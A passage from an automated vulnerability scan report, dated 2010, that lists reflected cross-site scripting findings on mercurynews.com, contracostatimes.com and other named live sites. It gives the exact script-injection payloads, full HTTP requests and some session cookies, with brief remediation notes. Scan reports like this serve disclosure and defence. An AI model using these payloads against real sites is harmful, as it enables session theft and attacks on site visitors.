The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 101e4<a>9b600e0037f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
3.36. http://consumertipsonline.net/health/us4.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://consumertipsonline.net
Path: /health/us4.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7593b"><img%20src%3da%20onerror%3dalert(1)>d68ba1043cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7593b\"><img src=a onerror=alert(1)>d68ba1043cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /health/us4.php?t=1239000/7593b"><img%20src%3da%20onerror%3dalert(1)>d68ba1043cd098\ HTTP/1.1
Host: consumertipsonline.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:52:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45510
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ea2e"><img%20src%3da%20onerror%3dalert(1)>88ccf899957 was submitted in the t parameter. This input was echoed as 3ea2e\"><img src=a onerror=alert(1)>88ccf899957 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /health/us4.php?t=1239000098\3ea2e"><img%20src%3da%20onerror%3dalert(1)>88ccf899957 HTTP/1.1
Host: consumertipsonline.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:52:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45484
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
The value of the b request parameter is copied into the HTML document as plain text between tags. The payload 2581e<script>alert(1)</script>b823be43aed was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 96c02<script>alert(1)</script>228aa39f1fa was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9fe88<script>alert(1)</script>fa305a07b2a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/p.json?callback=_ate.ad.hpr9fe88<script>alert(1)</script>fa305a07b2a HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Sat, 12 Feb 2011 23:11:03 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 14 Nov 2010 23:11:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 23:11:03 GMT
Connection: close
3.41. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.mercurynews.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac11"><script>alert(1)</script>811b9446da5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8ac11"><script>alert(1)</script>811b9446da5=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?8ac11"><script>alert(1)</script>811b9446da5=1" /> ...[SNIP]...
3.42. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.mercurynews.com
Path: /movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca30"><script>alert(1)</script>9fc7022dbe7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies?bca30"><script>alert(1)</script>9fc7022dbe7=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies?bca30"><script>alert(1)</script>9fc7022dbe7=1" /> ...[SNIP]...
3.43. http://events.mercurynews.com/performers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.mercurynews.com
Path: /performers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa537"><script>alert(1)</script>081b4c1c4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /performers?aa537"><script>alert(1)</script>081b4c1c4b2=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/performers?aa537"><script>alert(1)</script>081b4c1c4b2=1" /> ...[SNIP]...
3.44. http://events.mercurynews.com/restaurants [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.mercurynews.com
Path: /restaurants
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33257"><script>alert(1)</script>16f8b094cda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /restaurants?33257"><script>alert(1)</script>16f8b094cda=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/restaurants?33257"><script>alert(1)</script>16f8b094cda=1" /> ...[SNIP]...
3.45. http://events.mercurynews.com/venues [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/venues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 305e4"><script>alert(1)</script>1a2aba766b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /venues?305e4"><script>alert(1)</script>1a2aba766b3=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 86612<script>alert(1)</script>28ae8f0c402 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.47. http://forums.contracostatimes.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.contracostatimes.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4adba"-alert(1)-"e41b940e332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?4adba"-alert(1)-"e41b940e332=1 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:51 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54682
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41bf8"-alert(1)-"353834f6171 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll41bf8"-alert(1)-"353834f6171/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:05:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:05:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22843
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1011"-alert(1)-"87110bc119c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11d1011"-alert(1)-"87110bc119c HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:31 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:05:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20640
3.50. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ee8e"-alert(1)-"47271c9d198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11?8ee8e"-alert(1)-"47271c9d198=1 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:05:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20430
3.51. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e58"-alert(1)-"da78a3fd75c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?91e58"-alert(1)-"da78a3fd75c=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:11:57 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=6ec373c57579c10d331d00c8ebed1d1d; expires=Wed, 08 Dec 2010 02:45:17 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:12:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50878
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45812"-alert(1)-"613868a3771 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum45812"-alert(1)-"613868a3771/576 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22096
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79cf3"-alert(1)-"89396556484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/57679cf3"-alert(1)-"89396556484 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:36 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16253
3.54. http://forums.mercurynews.com/forum/576 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/576
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4beb6"-alert(1)-"9c54b14f479 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/576?4beb6"-alert(1)-"9c54b14f479=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response (redirected)
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20988
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6416f"-alert(1)-"3bf608c035c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum6416f"-alert(1)-"3bf608c035c/business-technology-business-news HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:23 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22156
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67461"-alert(1)-"eb6ddd1910a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/business-technology-business-news67461"-alert(1)-"eb6ddd1910a HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:32 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
